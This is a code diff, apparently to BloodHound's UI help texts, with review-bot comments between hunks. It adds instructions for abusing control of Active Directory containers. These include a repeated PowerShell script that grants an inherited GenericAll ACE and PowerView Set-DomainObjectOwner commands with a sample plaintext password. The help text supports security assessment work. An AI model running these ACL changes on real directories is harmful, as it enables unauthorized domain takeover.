diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/Abuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/Abuse.tsx index 5f414dc1d7..11ed587225 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/Abuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/Abuse.tsx @@ -18,7 +18,15 @@ import { FC } from 'react'; import { Typography } from '@mui/material'; const Abuse: FC = () => { - return There is no abuse info related to this edge.; + return ( + <> + + Permissions on the parent of a child object may enable compromise of the child object through inherited + ACEs or linked GPOs. + + See the inbound edges on the parent object for details. + + ); }; export default Abuse; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/General.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/General.tsx index 7a0a0a068b..f1d4c1b13b 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/General.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/General.tsx @@ -25,9 +25,6 @@ const General: FC = ({ sourceName, sourceType, targetName, target {typeFormat(sourceType)} {sourceName} contains the {typeFormat(targetType)} {targetName}. - - GPOs linked to a container apply to all objects that are contained by the container. - ); }; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx index 8b90d4e3f8..a3fe7b33c0 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx 
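Review bot: The new Abuse text for Contains says inherited ACEs reach the child object without the qualifier an analyst needs: a child whose DACL has inheritance disabled (the protected flag, as on AdminSDHolder-protected users and groups) does not receive ACEs inherited from its container, so not every child under the parent is reachable this way. A short sentence after the first paragraph keeps the help text accurate, e.g. `Inherited ACEs do not apply to child objects whose DACL has inheritance disabled (such as AdminSDHolder-protected principals).` With the GPO sentence removed from General.tsx in the same commit, this Abuse paragraph is now the only place the Contains help explains the GPO-link effect, so it should also say the GPO must be linked to the parent container or OU rather than merely mention "linked GPOs".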
@@ -17,6 +17,7 @@ import { FC } from 'react'; import { Link, Typography } from '@mui/material'; import { EdgeInfoProps } from '../index'; +import CodeController from '../CodeController/CodeController'; const WindowsAbuse: FC = ({ sourceName, @@ -699,6 +700,37 @@ const WindowsAbuse: FC = ); + case 'Container': + return ( + <> + + With full control of the container, you may add a new ACE on the container that will inherit + down to the objects under that container. + + This can be done with PowerShell: + + {`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE" + $principalName = "principal" # SAM account name of principal + + # Find the certificate template + $template = [ADSI]"LDAP://$containerDN" + + # Construct the ACE + $account = New-Object System.Security.Principal.NTAccount($principalName) + $sid = $account.Translate([System.Security.Principal.SecurityIdentifier]) + $ace = New-Object DirectoryServices.ActiveDirectoryAccessRule( + $sid, + [System.DirectoryServices.ActiveDirectoryRights]::GenericAll, + [System.Security.AccessControl.AccessControlType]::Allow, + [System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents + ) + # Add the new ACE to the ACL + $acl = $template.psbase.ObjectSecurity + $acl.AddAccessRule($ace) + $template.psbase.CommitChanges()`} + + + ); case 'CertTemplate': return ( <> diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx index 37662c2154..49cadd9a4c 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx @@ -17,6 +17,7 @@ import { FC } from 'react'; import { Link, Typography } from '@mui/material'; import { EdgeInfoProps } from '../index'; +import CodeController from '../CodeController/CodeController'; const WindowsAbuse: FC = ({ sourceName, 
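Review bot: The PowerShell sample in the new 'Container' case still carries the comment and variable names of the CertTemplate case it was copied from: `# Find the certificate template` introduces a bind to `$containerDN`, and the bound container is then held in `$template` for the rest of the script. Rename it so the example reads as what it does, `# Bind to the container` and `$container = [ADSI]"LDAP://$containerDN"`, with `$template` replaced by `$container` in the two later lines that read `psbase.ObjectSecurity` and call `psbase.CommitChanges()`. The same copied snippet appears in the Owns, WriteDacl and WriteOwner WindowsAbuse hunks of this commit and should be corrected the same way. The enclosing WindowsAbuse switch starts and ends outside this hunk.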
@@ -921,6 +922,37 @@ const WindowsAbuse: FC = ); + case 'Container': + return ( + <> + + With ownership of the container object, you may grant yourself the GenericAll permission + inherited to child objects. + + This can be done with PowerShell: + + {`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE" + $principalName = "principal" # SAM account name of principal + + # Find the certificate template + $template = [ADSI]"LDAP://$containerDN" + + # Construct the ACE + $account = New-Object System.Security.Principal.NTAccount($principalName) + $sid = $account.Translate([System.Security.Principal.SecurityIdentifier]) + $ace = New-Object DirectoryServices.ActiveDirectoryAccessRule( + $sid, + [System.DirectoryServices.ActiveDirectoryRights]::GenericAll, + [System.Security.AccessControl.AccessControlType]::Allow, + [System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents + ) + # Add the new ACE to the ACL + $acl = $template.psbase.ObjectSecurity + $acl.AddAccessRule($ace) + $template.psbase.CommitChanges()`} + + + ); case 'CertTemplate': return ( <> diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx index a779a5cb52..3bbd5e23d5 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx @@ -17,6 +17,7 @@ import { FC } from 'react'; import { Link, Typography } from '@mui/material'; import { EdgeInfoProps } from '../index'; +import CodeController from '../CodeController/CodeController'; const WindowsAbuse: FC = ({ sourceName, 
@@ -864,6 +865,37 @@ const WindowsAbuse: FC = ); + case 'Container': + return ( + <> + + With WriteDacl on the container object, you may grant yourself the GenericAll permission + inherited to child objects. + + This can be done with PowerShell: + + {`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE" + $principalName = "principal" # SAM account name of principal + + # Find the certificate template + $template = [ADSI]"LDAP://$containerDN" + + # Construct the ACE + $account = New-Object System.Security.Principal.NTAccount($principalName) + $sid = $account.Translate([System.Security.Principal.SecurityIdentifier]) + $ace = New-Object DirectoryServices.ActiveDirectoryAccessRule( + $sid, + [System.DirectoryServices.ActiveDirectoryRights]::GenericAll, + [System.Security.AccessControl.AccessControlType]::Allow, + [System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents + ) + # Add the new ACE to the ACL + $acl = $template.psbase.ObjectSecurity + $acl.AddAccessRule($ace) + $template.psbase.CommitChanges()`} + + + ); case 'CertTemplate': return ( <> diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx index cbeda9895e..0fbdf7bb87 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx @@ -17,6 +17,7 @@ import { FC } from 'react'; import { Link, Typography } from '@mui/material'; import { EdgeInfoProps } from '../index'; +import CodeController from '../CodeController/CodeController'; const WindowsAbuse: FC = ({ sourceName, 
@@ -1019,6 +1020,60 @@ const WindowsAbuse: FC = ); + case 'Container': + return ( + <> + + To change the ownership of the object, you may use the Set-DomainObjectOwner function in + PowerView. + + + You may need to authenticate to the Domain Controller as{' '} + {sourceType === 'User' + ? `${sourceName} if you are not running a process as that user` + : `a member of ${sourceName} if you are not running a process as a member`} + . To do this in conjunction with Set-DomainObjectOwner, first create a PSCredential object + (these examples comes from the PowerView help documentation): + + + {"$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n" + + "$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)"} + + + Then, use Set-DomainObjectOwner, optionally specifying $Cred if you are not already running a + process as a member of (the group that holds this ACE): + + + {'Set-DomainObjectOwner -Credential $Cred -TargetIdentity dfm -OwnerIdentity harmj0y'} + + + Now with ownership of the container object, you may grant yourself the GenericAll permission + inherited to child objects. 
+ + This can be done with PowerShell: + + {`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE" + $principalName = "principal" # SAM account name of principal + + # Find the certificate template + $template = [ADSI]"LDAP://$containerDN" + + # Construct the ACE + $account = New-Object System.Security.Principal.NTAccount($principalName) + $sid = $account.Translate([System.Security.Principal.SecurityIdentifier]) + $ace = New-Object DirectoryServices.ActiveDirectoryAccessRule( + $sid, + [System.DirectoryServices.ActiveDirectoryRights]::GenericAll, + [System.Security.AccessControl.AccessControlType]::Allow, + [System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents + ) + # Add the new ACE to the ACL + $acl = $template.psbase.ObjectSecurity + $acl.AddAccessRule($ace) + $template.psbase.CommitChanges()`} + + + ); case 'CertTemplate': return ( <>
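Review bot: The Set-DomainObjectOwner example in the new 'Container' case targets `dfm`, the user name from the PowerView documentation, instead of the container this help text is about, and the sentence before it, `optionally specifying $Cred if you are not already running a process as a member of (the group that holds this ACE):`, is an unfinished template left from another edge's text. Point the example at the placeholders the later script already uses, `{'Set-DomainObjectOwner -Credential $Cred -TargetIdentity "CN=USERS,DC=DUMPSTER,DC=FIRE" -OwnerIdentity principal'}`, and finish the sentence with the group, `as a member of {sourceName}:`. Two smaller wording points in the same paragraph: `these examples comes from` should read `these examples come from`, and "Now with ownership" reads better as "With ownership". The enclosing WindowsAbuse switch starts and ends outside this hunk.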